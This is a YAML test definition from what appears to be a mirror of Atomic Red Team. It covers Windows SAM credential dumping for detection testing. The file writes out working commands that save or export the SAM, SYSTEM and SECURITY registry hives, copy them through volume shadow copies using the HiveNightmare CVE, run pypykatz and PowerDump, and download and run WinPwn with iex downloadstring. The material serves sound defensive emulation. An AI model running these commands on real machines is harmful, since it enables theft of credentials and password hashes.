security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
85339c0e48af58a964dcf2e15e1fef554062f4ee
atomic-red-team/atomics/T1003.002/T1003.002.yaml
T
Hare Sudhan bfdd702717 Remove unused variable (#3040)
2025-01-28 00:02:41 -05:00

193 lines
8.1 KiB
YAML
Raw Blame History

attack_technique: T1003.002
display_name: "OS Credential Dumping: Security Account Manager"
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
supported_platforms:
- windows
executor:
command: |
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
cleanup_command: |
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
name: command_prompt
elevation_required: true
- name: Registry parse with pypykatz
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
description: |
Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
supported_platforms:
- windows
input_arguments:
venv_path:
description: Path to the folder for the tactics venv
type: string
default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
dependency_executor_name: powershell
dependencies:
- description: |
Computer must have python 3 installed
prereq_command: |
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
- description: |
Computer must have venv configured at #{venv_path}
prereq_command: |
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
get_prereq_command: |
py -m venv "#{venv_path}"
- description: |
pypykatz must be installed
prereq_command: |
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
executor:
command: |
"#{venv_path}\Scripts\pypykatz" live lsa
name: command_prompt
elevation_required: true
- name: esentutl.exe SAM copy
auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
description: |
Copy the SAM hive using the esentutl.exe utility
This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
supported_platforms:
- windows
input_arguments:
file_path:
description: Path to the file to copy
type: path
default: '%SystemRoot%/system32/config/SAM'
file_name:
description: Name of the copied file
type: string
default: SAM
copy_dest:
description: Destination of the copied file
type: string
default: '%temp%'
executor:
command: |
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
name: command_prompt
elevation_required: true
cleanup_command: |
del #{copy_dest}\#{file_name} >nul 2>&1
- name: PowerDump Hashes and Usernames from Registry
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
description: Executes a hashdump by reading the hashes from the registry.
supported_platforms:
- windows
dependencies:
- description: PowerDump script must exist on disk at specified location
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1} '
get_prereq_command: |-
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
executor:
command: |-
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
name: powershell
elevation_required: true
- name: dump volume shadow copy hives with certutil
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
description: |
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM".
This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
supported_platforms:
- windows
input_arguments:
target_hive:
description: Hive you wish to dump
type: string
default: SAM
limit:
description: Limit to the number of shadow copies to iterate through when trying to copy the hive
type: integer
default: 10
executor:
command: |
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
name: command_prompt
elevation_required: false
cleanup_command: |
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
- name: dump volume shadow copy hives with System.IO.File
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
description: |
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
supported_platforms:
- windows
input_arguments:
target_hive:
description: Hive you wish to dump
type: string
default: SAM
limit:
description: Limit to the number of shadow copies to iterate through when trying to copy the hive
type: integer
default: 10
executor:
command: |
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
name: powershell
elevation_required: false
cleanup_command: |
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
- name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
name: powershell
- name: Dumping of SAM, creds, and secrets(Reg Export)
auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
supported_platforms:
- windows
executor:
command: |
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
cleanup_command: |
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
name: command_prompt
elevation_required: true
Reference in New Issue View Git Blame Copy Permalink